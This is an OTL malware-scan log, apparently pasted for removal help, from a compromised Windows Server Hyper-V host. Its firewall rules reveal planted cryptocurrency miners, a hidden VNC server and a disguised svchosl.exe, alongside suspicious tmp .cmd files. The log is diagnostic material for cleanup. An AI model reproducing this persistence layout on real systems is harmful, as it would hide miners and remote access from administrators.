[2014/02/10 09:29:43 | 000,021,328 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/02/10 09:29:43 | 000,021,328 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/02/09 08:39:11 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp51.cmd
[2014/02/07 15:08:22 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp44.cmd
[2014/02/06 06:11:52 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp37.cmd
[2014/02/05 11:04:26 | 004,380,160 | ---- | M] () -- C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
[2014/02/05 10:07:04 | 004,121,952 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\administrator.COMPANY\Desktop\TDSSKiller.exe
[2014/02/05 09:53:16 | 002,080,256 | ---- | M] (Farbar) -- C:\Users\administrator.COMPANY\Desktop\FRST64.exe
[2014/02/04 18:55:23 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp28.cmd
[2014/02/04 05:33:59 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp23.cmd
[2014/02/01 09:08:23 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp16.cmd
[2014/01/30 19:50:10 | 000,000,034 | ---- | M] () -- C:\Windows\SysWow64\tmp9.cmd
[2014/01/29 14:03:31 | 000,119,000 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/01/29 14:03:13 | 000,091,352 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/01/29 10:56:07 | 000,600,292 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/01/29 10:56:06 | 000,694,294 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/01/29 10:56:06 | 000,098,966 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/01/29 10:49:17 | 025,804,800 | ---- | M] () -- C:\Windows\SysNative\vmguest.iso
[2014/01/29 10:47:19 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/29 09:39:03 | 000,001,105 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/01/29 09:34:07 | 010,285,040 | ---- | M] (Malwarebytes Corporation                                    ) -- C:\Users\administrator.COMPANY\Desktop\mbam-setup-1.75.0.1300.exe
[2014/01/26 20:15:20 | 000,007,629 | ---- | M] () -- C:\Users\administrator.COMPANY\AppData\Local\Resmon.ResmonCfg
[2014/01/26 19:52:27 | 000,001,945 | ---- | M] () -- C:\Windows\epplauncher.mif
[2014/01/26 19:52:21 | 000,707,672 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/01/26 19:42:01 | 000,002,275 | ---- | M] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/01/23 12:08:40 | 000,000,890 | ---- | M] () -- C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
[2014/01/23 12:08:18 | 001,536,352 | ---- | M] (Threat Expert Ltd.                                          ) -- C:\Users\administrator.COMPANY\Desktop\TEMSSetup-x64.exe
[2014/01/23 11:20:16 | 012,589,848 | ---- | M] (Malwarebytes Corp.) -- C:\Users\administrator.COMPANY\Desktop\mbar-1.07.0.1009.exe
[2014/01/23 11:10:50 | 001,037,068 | ---- | M] (Thisisu) -- C:\Users\administrator.COMPANY\Desktop\JRT.exe
[2014/01/23 11:06:08 | 001,236,282 | ---- | M] () -- C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
[2014/01/23 11:03:07 | 005,173,757 | ---- | M] (Swearware) -- C:\Users\administrator.COMPANY\Desktop\ComboFix.exe
[2014/01/17 10:49:16 | 000,001,403 | ---- | M] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
 
========== Files Created - No Company Name ==========
 
[2014/02/12 08:08:58 | 000,000,894 | ---- | C] () -- C:\Windows\SysWow64\tmp62.cmd
[2014/02/12 08:01:31 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp61.cmd
[2014/02/11 05:04:06 | 000,000,890 | ---- | C] () -- C:\Windows\SysWow64\tmp59.cmd
[2014/02/11 05:00:38 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp58.cmd
[2014/02/11 04:57:11 | 000,001,462 | ---- | C] () -- C:\Windows\SysWow64\tmp57.cmd
[2014/02/09 08:39:11 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp51.cmd
[2014/02/07 15:08:22 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp44.cmd
[2014/02/06 06:11:52 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp37.cmd
[2014/02/05 11:04:26 | 004,380,160 | ---- | C] () -- C:\Users\administrator.COMPANY\Desktop\RogueKillerX64.exe
[2014/02/04 18:55:23 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp28.cmd
[2014/02/01 09:08:23 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp16.cmd
[2014/01/29 09:39:03 | 000,001,105 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/01/26 20:15:20 | 000,007,629 | ---- | C] () -- C:\Users\administrator.COMPANY\AppData\Local\Resmon.ResmonCfg
[2014/01/26 19:52:17 | 000,001,927 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Forefront Endpoint Protection 2010.lnk
[2014/01/26 19:47:26 | 000,001,990 | -H-- | C] () -- C:\Users\administrator.COMPANY\Documents\Default.rdp
[2014/01/26 19:42:01 | 000,002,275 | ---- | C] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/01/26 02:56:06 | 000,000,912 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/01/26 02:56:06 | 000,000,908 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/01/23 12:08:40 | 000,000,890 | ---- | C] () -- C:\Users\Public\Desktop\ThreatExpert Memory Scanner.lnk
[2014/01/23 11:06:08 | 001,236,282 | ---- | C] () -- C:\Users\administrator.COMPANY\Desktop\AdwCleaner.exe
[2014/01/21 16:24:52 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp9.cmd
[2014/01/20 15:16:02 | 000,001,945 | ---- | C] () -- C:\Windows\epplauncher.mif
[2014/01/20 15:15:54 | 000,707,672 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2014/01/17 12:12:24 | 000,000,034 | ---- | C] () -- C:\Windows\SysWow64\tmp23.cmd
[2014/01/17 10:49:16 | 000,001,403 | ---- | C] () -- C:\Users\administrator.COMPANY\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2013/12/01 12:17:10 | 000,010,130 | RHS- | C] () -- C:\ProgramData\ntuser.pol
 
========== ZeroAccess Check ==========
 
[2009/07/14 05:58:08 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2013/07/26 03:24:57 | 014,172,672 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2013/07/26 02:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 04:24:24 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

< End of report >
 


Extras.T Log:

 

OTL Extras logfile created on: 2/12/2014 2:47:42 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\administrator.COMPANY\Desktop
64bit- Server Standard Edition (full installation) Service Pack 1 (Version = 6.1.7601) - Type = NTServer
Internet Explorer (Version = 9.10.9200.16736)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
13.99 Gb Total Physical Memory | 2.37 Gb Available Physical Memory | 16.94% Memory free
27.98 Gb Paging File | 16.20 Gb Available in Paging File | 57.90% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 60.00 Gb Total Space | 31.49 Gb Free Space | 52.49% Space Free | Partition Type: NTFS
Drive D: | 486.80 Gb Total Space | 145.86 Gb Free Space | 29.96% Space Free | Partition Type: NTFS
 
Computer Name: COMPANY-HV | User Name: administrator | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- "%systemroot%\system32\rundll32.exe" "%systemroot%\system32\mshtml.dll",PrintHTML "%1"
http [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
https [open] -- "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- Reg Error: Value error.
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
 
========== Firewall Settings ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"EnableFirewall" = 1
"DisableNotifications" = 1
"DefaultOutboundAction" = 0
"DefaultInboundAction" = 1
 
========== Authorized Applications List ==========
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{61F2E994-2307-4EDB-9FD8-FC2671761FD6}" = lport=3389 | protocol=6 | dir=in | name=rdp |
"{65CD34A4-B5F5-45D0-948D-193C87D5E2F6}" = lport=5723 | protocol=6 | dir=in | name=operations manager health service. |
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{16E8CF16-C14B-46FD-A69D-48BBCEAEF1CC}" = dir=in | app=%systemroot%\mtc\mtc_minerd32.exe |
"{17F45A38-1DA1-416D-AD62-5FA9B9E89800}" = dir=in | app=%systemroot%\xpm\xpm_minerd32.exe |
"{2BDCC1FF-583A-4889-9217-368DFE7FD7DF}" = dir=in | app=%systemroot%\pts\pts_minerd.exe |
"{4BA5D8AA-E41E-476D-86A2-D37F55373783}" = dir=out | app=%systemroot%\pts\pts_minerd32.exe |
"{5CA8A5F9-B39E-45B3-80E1-CEE3C2979218}" = dir=in | app=%systemroot%\tanechka\realvnc.exe |
"{75A08EE6-03EA-4B12-A3D0-48081187B980}" = dir=in | app=%systemroot%\xpm\xpm_minerd.exe |
"{93D58FB7-CBBC-4869-B15A-C01CA6293474}" = dir=out | app=%systemroot%\xpm\xpm_minerd32.exe |
"{A49A6938-87B8-4832-96E8-F3B585E59502}" = dir=out | app=%systemroot%\mtc\mtc_minerd32.exe |
"{BD32485C-F3A8-4AA5-8CD2-5D36318E93A5}" = dir=out | app=%systemroot%\pts\pts_minerd.exe |
"{BD65746C-07B8-4D6C-BD9C-B54E0BA8EC04}" = dir=in | app=%systemroot%\pts\pts_minerd32.exe |
"{D5FF61DA-DAD1-4814-BA3D-19F6A57E6974}" = dir=out | app=%systemroot%\tanechka\realvnc.exe |
"{E2498AEA-ADD8-46F8-AA0B-036513D318CD}" = dir=in | app=%systemroot%\mtc\mtc_minerd.exe |
"{E5A2FBE6-D0F1-4AA6-8FDC-847CA10026A0}" = dir=out | app=%systemroot%\tanechka\svchosl.exe |
"{EC4365F0-A777-4BD5-9D9D-08A41F65ED36}" = dir=out | app=%systemroot%\mtc\mtc_minerd.exe |
"{F4FC679D-1A41-47E3-BEC3-9A28E9D4724A}" = dir=out | app=%systemroot%\xpm\xpm_minerd.exe |
"{F7BC4FD0-CB22-4D68-B55B-0C3867E651C2}" = dir=in | app=%systemroot%\tanechka\svchosl.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0E0818E4-C87B-4211-9791-E958BD34B96C}" = Microsoft Forefront Endpoint Protection 2010 Server Management
"{0F27A9B5-63FD-43DB-8230-FFE1E9CFE2C4}" = HP Smart Array SAS/SATA Event Notification Service
"{2E97856A-345A-475D-913C-B8A78406BDF6}" = HP Lights-Out Online Configuration Utility
"{3696BAB3-3B1B-42C3-8D46-1898E59E7C84}" = Active Directory Management Pack Helper Object
"{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{74D49383-7EF9-4FD3-B5B0-73CA22F51CE8}" = HP ProLiant Remote Monitor Service
"{774088D4-0777-4D78-904D-E435B318F5D2}" = Microsoft Antimalware
"{80C2A57A-4193-4800-AA27-CD79553FE9DF}" = System Center 2012 - Operations Manager Gateway
"{B7B52204-2CC8-477A-9C7A-382C31070A62}" = HP Insight Management Agents
"{CF222EB4-4EF7-40F4-A62B-A03E214C20DE}" = HP ProLiant Integrated Management Log Viewer
"{DCEA910B-3269-4F5B-A915-D59293004751}" = HP Insight Diagnostics  Online Edition for Windows
"{E77543EE-6FB5-4FF6-AB70-635392C8C756}" = Microsoft Security Client
"ATI Display Driver" = ATI Display Driver
"Microsoft Security Client" = Microsoft Forefront Endpoint Protection 2010
"ThreatExpert Memory Scanner_is1" = ThreatExpert Memory Scanner 1.0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{14A5045C-33EE-4596-AA69-8761611AE8EB}" = HP Array Configuration Utility CLI
"{173438F5-BD4D-47AE-9C8F-73E6BAA62624}" = PFA Server Registry Update
"{23170F69-40C1-2701-0920-000001000000}" = 7-Zip 9.20
"{34D6E797-AA32-455D-8E65-4EBD1AC9DED7}" = HP ProLiant PCI-express Power Management Update for Windows
"{3C4DF0FD-95CF-4F7B-A816-97CEF616948F}" = HP System Management Homepage
"{4E5563B6-DE0A-4F3B-A5D6-15789FD12D9B}" = Headless Server Registry Update
"{5A5F45AE-0250-4C34-9D89-F10BDDEE665F}" = HP Version Control Agent
"{74C48700-A6A7-4B3D-BD3A-C4E131CDD8E8}" = HP Array Configuration Utility
"{A49F249F-0C91-497F-86DF-B2585E8E76B7}" = Microsoft Visual C++ 2005 Redistributable
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"Google Chrome" = Google Chrome
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.75.0.1300
 
========== Last 20 Event Log Errors ==========
 
[ Application Events ]
Error - 2/8/2014 4:00:29 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-08T20:00:29.104824000Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/9/2014 4:00:17 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/9/2014 4:00:17 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-09T20:00:17.310678600Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/10/2014 4:00:09 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/10/2014 4:00:09 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-10T20:00:09.424823500Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/11/2014 4:00:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 561
Description = The backup operation that started at '1601-01-01T00:00:00.000000000Z'
 has failed because no backup storage location could be found. Please confirm that
 the backup storage location is attached and online, and then rerun the backup operation.
 
Error - 2/11/2014 4:00:10 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft-Windows-Backup | ID = 546
Description = The backup operation attempted at '2014-02-11T20:00:10.347412500Z'
 has failed to start, error code '2155348061' (%%2155348061). Please review the
event details for a solution, and then rerun the backup operation once the issue
 is resolved.
 
Error - 2/11/2014 8:18:50 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
Error - 2/11/2014 9:03:21 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
Error - 2/11/2014 9:29:53 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Winlogon | ID = 4005
Description = The Windows logon process has unexpectedly terminated.
 
[ Operations Manager Events ]
Error - 2/9/2014 9:11:53 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:22:23 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:33:57 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 9:35:03 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21016
Description = OpsMgr was unable to set up a communications channel to scom01.asapnet.local
 and there are no failover hosts.  Communication will resume when scom01.asapnet.local
 is available and communication from this computer is allowed.
 
Error - 2/9/2014 9:38:44 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 10:18:44 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 10:30:52 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 11:36:25 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
Error - 2/9/2014 11:37:29 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21016
Description = OpsMgr was unable to set up a communications channel to scom01.asapnet.local
 and there are no failover hosts.  Communication will resume when scom01.asapnet.local
 is available and communication from this computer is allowed.
 
Error - 2/9/2014 11:50:53 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = OpsMgr Connector | ID = 21006
Description = The OpsMgr Connector could not connect to scom01.asapnet.local:5723.
  The error code is 10060L(A connection attempt failed because the connected party
 did not properly respond after a period of time, or established connection failed
 because connected host has failed to respond.).  Please verify there is network
 connectivity, the server is running and has registered it's listening port, and
 there are no firewalls blocking traffic to the destination.
 
[ System Events ]
Error - 2/10/2014 9:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3760.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 5:52:31 AM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
 Version:      Previous Signature Version: 1.165.3760.0     Update Source: %%849     Update Stage:
 %%852     Source Path:
 AUTHORITY\SYSTEM     Current Engine Version:      Previous Engine Version: 1.1.10201.0     Error
 code: 0x8024402c     Error description: An unexpected problem occurred while checking
 for updates. For information on installing or troubleshooting updates, see Help
 and Support.
 
Error - 2/11/2014 1:52:31 PM | Computer Name = COMPANY-HV.COMPANY.local | Source = Microsoft Antimalware | ID = 2001
Description = %%860 has encountered an error trying to update signatures.     New Signature
